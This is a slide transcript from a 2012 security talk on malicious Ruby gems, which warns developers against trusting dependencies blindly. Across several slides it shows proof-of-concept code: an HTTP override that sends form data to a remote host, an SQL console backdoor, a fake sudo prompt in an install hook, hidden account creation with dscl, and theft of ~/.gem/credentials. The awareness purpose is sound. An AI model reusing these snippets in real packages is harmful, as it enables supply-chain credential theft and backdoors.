Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Hacking with Gems

Hacking with Gems

Do you ever use "gem install"? What about bundle?

What's the worst that could happen if your app has a dependency on a malicious gem? How easy would it be to write a gem that could compromise a box?

Much of the Ruby community blindly trusts our gems. This talk will make you second guess that trust. It will also show you how to vet gems that you do choose to use.

Benjamin Smith

October 09, 2012
Tweet

More Decks by Benjamin Smith

Other Decks in Technology

Transcript

  1. what’s in my app? GEM remote: https://rubygems.org/ specs: actionmailer (3.2.8)

    actionpack (= 3.2.8) mail (~> 2.4.4) actionpack (3.2.8) activemodel (= 3.2.8) activesupport (= 3.2.8) builder (~> 3.0.0) erubis (~> 2.7.0) ... Wednesday, October 10, 12
  2. show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V

    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12
  3. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12
  4. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12
  5. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12
  6. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12
  7. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12
  8. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12
  9. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Wednesday, October 10, 12
  10. what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1

    Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s Wednesday, October 10, 12
  11. behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar

    -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s Wednesday, October 10, 12
  12. truth time • this gem doesn't actually work • but

    it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s Wednesday, October 10, 12
  13. that was easy hard. what else can I do? (that's

    easier) Wednesday, October 10, 12
  14. what it does > true.should be_true > User.new.should be_true >

    User.new.should be_truthy github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12
  15. run the what file? Gem::Specification.new do |gem| ... gem.extensions =

    ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12
  16. gem fetch vs gem install > gem fetch be_truthy >

    gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12
  17. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12
  18. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12
  19. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12
  20. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12
  21. /usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .

    -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12
  22. back to the truthy_gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read

    gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12
  23. back to the truthy_gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read

    gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12
  24. back to the truthy_gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read

    gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12
  25. back to the truthy_gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read

    gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12
  26. > git clone your-gem-repo ...add a little code... > rake

    build > gem push your-gem github.com/benjaminleesmith/be_truthy Wednesday, October 10, 12